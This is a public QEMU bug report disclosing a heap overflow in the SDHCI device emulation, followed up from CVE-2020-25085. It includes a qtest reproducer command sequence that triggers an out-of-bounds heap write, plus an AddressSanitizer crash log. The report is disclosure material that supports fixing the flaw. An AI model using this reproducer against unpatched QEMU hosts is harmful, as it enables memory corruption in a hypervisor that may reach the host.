QEMU: Heap Overflow vulnerability in SDHCI Component
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
QEMU |
Fix Released
|
Undecided
|
Philippe Mathieu-Daudé |
Bug Description
Hello, i want to report qemu vulnerability in SDHCI component, this is integer overflow bug leads to oob read/write in the heap, that can happens in sdhci_do_adma or sdhci_sdma_
This is caused when in the middle of unfinished transfer, blksize can change, but the data_count still have the last offset of fifo_buffer from the last transfer. We change blksize to zero, then in the next transfer dma_memory_
This bug is recorded in CVE-2020-25085, but the fix is not complete and not fix the root cause of the bug.
Reproducer:
outl 0xcf8 0x80001010
outl 0xcfc 0xd7055dba
outl 0xcf8 0x80001003
outl 0xcfc 0x86b1d733
write 0x00 0x1 0x29
write 0x02 0x1 0x10
write 0x08 0x1 0x39
writeb 0xd7055d2b 0x5e
writel 0xd7055d2c 0xed7d735
writew 0xd7055d30 0x126e
writeb 0xd7055d32 0x84
writel 0xd7055d24 0xd7346e01
writew 0xd7055d28 0x3bd7
writeb 0xd7055d2a 0x1
writeb 0xd7055d05 0x2c
writew 0xd7055d06 0x5c4
writeb 0xd7055d0c 0x21
writew 0xd7055d0e 0x846e
writel 0xd7055d04 0x260000
writew 0xd7055d08 0x0
writeb 0xd7055d0a 0x6d
writeb 0xd7055d0c 0x31
clock_step
EOF
➜ x86_64-softmmu git:(master) ✗ ./qemu-
==410717==WARNING: ASan doesn't fully support makecontext/
[I 1609122395.789698] OPENED
qemu-system-x86_64: -drive if=sd,index=
[R +0.037381] outl 0xcf8 0x80001010
[S +0.037436] OK
OK
[R +0.037470] outl 0xcfc 0xd7055dba
[S +0.037510] OK
OK
[R +0.037531] outl 0xcf8 0x80001003
[S +0.037549] OK
OK
[R +0.037571] outl 0xcfc 0x86b1d733
[S +0.039830] OK
OK
[R +0.039882] write 0x00 0x1 0x29
[S +0.040364] OK
OK
[R +0.040401] write 0x02 0x1 0x10
[S +0.040428] OK
OK
[R +0.040449] write 0x08 0x1 0x39
[S +0.040472] OK
OK
[R +0.040491] writeb 0xd7055d2b 0x5e
[S +0.040530] OK
OK
[R +0.040550] writel 0xd7055d2c 0xed7d735
[S +0.040575] OK
OK
[R +0.040594] writew 0xd7055d30 0x126e
[S +0.040620] OK
OK
[R +0.040638] writeb 0xd7055d32 0x84
[S +0.040658] OK
OK
[R +0.040676] writel 0xd7055d24 0xd7346e01
[S +0.040697] OK
OK
[R +0.040715] writew 0xd7055d28 0x3bd7
[S +0.040738] OK
OK
[R +0.040756] writeb 0xd7055d2a 0x1
[S +0.040779] OK
OK
[R +0.040797] writeb 0xd7055d05 0x2c
[S +0.040819] OK
OK
[R +0.040840] writew 0xd7055d06 0x5c4
[S +0.040862] OK
OK
[R +0.040882] writeb 0xd7055d0c 0x21
[S +0.040907] OK
OK
[R +0.040927] writew 0xd7055d0e 0x846e
[S +0.041026] OK
OK
[R +0.041054] writel 0xd7055d04 0x260000
[S +0.041115] OK
OK
[R +0.041139] writew 0xd7055d08 0x0
=======
==410717==ERROR: AddressSanitizer: heap-buffer-
WRITE of size 786432 at 0x615000024180 thread T0
#0 0x7fe40cb7457c (/lib/x86_
#1 0x55f804942120 in flatview_
#2 0x55f8049423dd in flatview_read ../../softmmu/
#3 0x55f804942581 in address_
#4 0x55f804942800 in address_space_rw ../../softmmu/
#5 0x55f8038d6a92 in dma_memory_
#6 0x55f8038d6adf in dma_memory_rw /home/n0p/
#7 0x55f8038d6b17 in dma_memory_read /home/n0p/
#8 0x55f8038e47d9 in sdhci_do_adma ../../hw/
#9 0x55f8038e6081 in sdhci_data_transfer ../../hw/
#10 0x55f8038e694c in sdhci_resume_
#11 0x55f8038e9227 in sdhci_write ../../hw/
#12 0x55f804856869 in memory_
#13 0x55f804856cf4 in access_
#14 0x55f804863f28 in memory_
#15 0x55f8049419ce in flatview_
#16 0x55f804941da4 in flatview_write ../../softmmu/
#17 0x55f804942724 in address_space_write ../../softmmu/
#18 0x55f804a9bee3 in qtest_process_
#19 0x55f804aa0dea in qtest_process_inbuf ../../softmmu/
#20 0x55f804aa0edb in qtest_read ../../softmmu/
#21 0x55f804ffb687 in qemu_chr_
#22 0x55f804ffb731 in qemu_chr_be_write ../../chardev/
#23 0x55f804fe5369 in fd_chr_read ../../chardev/
#24 0x55f804f9b2dd in qio_channel_
#25 0x7fe40c548e8d in g_main_
#26 0x55f80540b38e in glib_pollfds_poll ../../util/
#27 0x55f80540b56f in os_host_
#28 0x55f80540b871 in main_loop_wait ../../util/
#29 0x55f80478602b in qemu_main_loop ../../softmmu/
#30 0x55f8038091c9 in main ../../softmmu/
#31 0x7fe409dc80b2 in __libc_start_main (/lib/x86_
#32 0x55f8038090dd in _start (/home/
0x615000024180 is located 0 bytes to the right of 512-byte region [0x615000023f80
allocated by thread T0 here:
#0 0x7fe40cbe6dc6 in calloc (/lib/x86_
#1 0x7fe40c54ed30 in g_malloc0 (/lib/x86_
#2 0x55f8040cd37b in sdhci_pci_realize ../../hw/
#3 0x55f80411c6f5 in pci_qdev_realize ../../hw/
#4 0x55f804fc7834 in device_set_realized ../../hw/
#5 0x55f804f8002c in property_set_bool ../../qom/
#6 0x55f804f7a840 in object_property_set ../../qom/
#7 0x55f804f83419 in object_
#8 0x55f804f7ae44 in object_
#9 0x55f804fc417a in qdev_realize ../../hw/
#10 0x55f803da8bb7 in qdev_device_add ../../softmmu/
#11 0x55f8047f5408 in device_init_func ../../softmmu/
#12 0x55f8053d3644 in qemu_opts_foreach ../../util/
#13 0x55f8047fc593 in qemu_create_
#14 0x55f8047fc6fa in qmp_x_exit_
#15 0x55f804801c8e in qemu_init ../../softmmu/
#16 0x55f8038091c4 in main ../../softmmu/
#17 0x7fe409dc80b2 in __libc_start_main (/lib/x86_
SUMMARY: AddressSanitizer: heap-buffer-
Shadow bytes around the buggy address:
0x0c2a7fffc7e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffc7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffc800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffc810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffc820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2a7fffc83
0x0c2a7fffc840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffc850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffc860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffc870: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffc880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==410717==ABORTING
CVE References
information type: | Private Security → Public Security |
Please don't report security issues as private bugs here, see https:/ /www.qemu. org/contribute/ security- process/ for QEMU's security process. Thanks.